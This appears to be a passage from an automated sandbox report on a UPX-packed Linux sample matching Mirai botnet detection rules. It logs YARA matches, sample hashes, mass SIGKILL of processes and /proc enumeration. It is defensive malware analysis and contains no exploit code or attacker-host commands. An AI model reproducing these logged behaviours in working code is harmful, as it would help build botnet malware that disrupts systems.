https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Sample tries to kill a process (SIGKILL)
Source: /tmp/VAkpLB9NSD (PID: 5275) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5275, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1860, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5037, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5176, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5177, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5280, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5281, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5308, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5360, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5375, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5448, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5452, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5571, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5572, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5578, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5659, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5664, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5675, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5680, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5684, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5686, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5689, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5749, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5762, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5765, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5772, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5794, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5797, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5807, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5811, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5868, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5885, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5889, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5900, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5912, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5916, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5920, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5923, result: successful Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) SIGKILL sent: pid: 5983, result: successful Jump to behavior
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/228@14/0

Data Obfuscation:

barindex
Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.96 Copyright (C) 1996-2020 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /usr/bin/dbus-daemon (PID: 5360) File: /proc/5360/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5531) File: /proc/5531/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5536) File: /proc/5536/mounts Jump to behavior
Source: /bin/fusermount (PID: 5548) File: /proc/5548/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5572) File: /proc/5572/mounts Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5680) File: /proc/5680/mounts
Source: /usr/bin/dbus-daemon (PID: 5686) File: /proc/5686/mounts
Source: /usr/bin/dbus-daemon (PID: 5807) File: /proc/5807/mounts
Source: /usr/bin/dbus-daemon (PID: 5912) File: /proc/5912/mounts
Source: /usr/bin/dbus-daemon (PID: 5920) File: /proc/5920/mounts
Source: /usr/bin/dbus-daemon (PID: 6034) File: /proc/6034/mounts
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /usr/share/gdm/generate-config (PID: 5496) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5678) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5913) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/sh (PID: 5460) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5462) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5464) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5466) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5468) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5470) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5473) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5477) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5522) Grep executable: /usr/bin/grep -> grep -F .utf8 Jump to behavior
Source: /bin/sh (PID: 5642) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5645) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5650) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5655) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5658) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5661) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5668) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5673) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5785) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /bin/sh (PID: 5877) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5886) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5888) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5891) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5894) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5899) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 5902) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
Source: /bin/sh (PID: 5906) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
Source: /bin/sh (PID: 6022) Grep executable: /usr/bin/grep -> grep -F .utf8
Reads system information from the proc file system
Source: /lib/systemd/systemd-journald (PID: 5308) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5571) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5675) Reads from proc file: /proc/meminfo Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5772) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 5900) Reads from proc file: /proc/meminfo
Source: /lib/systemd/systemd-journald (PID: 6004) Reads from proc file: /proc/meminfo
Enumerates processes within the "proc" file system
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/491/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/793/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/772/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/796/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/774/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/797/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/777/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/799/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/658/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/912/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/759/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/936/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/918/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/1/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/761/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/785/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/884/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/720/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/721/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/788/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/789/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/800/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/801/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/847/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5275) File opened: /proc/904/fd Jump to behavior
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5794/status
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/1/environ
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/1/sched
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/1/cgroup
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5907/comm
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5907/cgroup
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5909/stat
Source: /lib/systemd/systemd (PID: 5794) File opened: /proc/5802/comm
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/5142/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1582/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1582/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/3088/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1579/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1579/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1699/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1698/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1335/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1335/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1334/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1334/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1576/fd Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/1576/exe Jump to behavior
Source: /tmp/VAkpLB9NSD (PID: 5278) File opened: /proc/2302/fd Jump to behavior
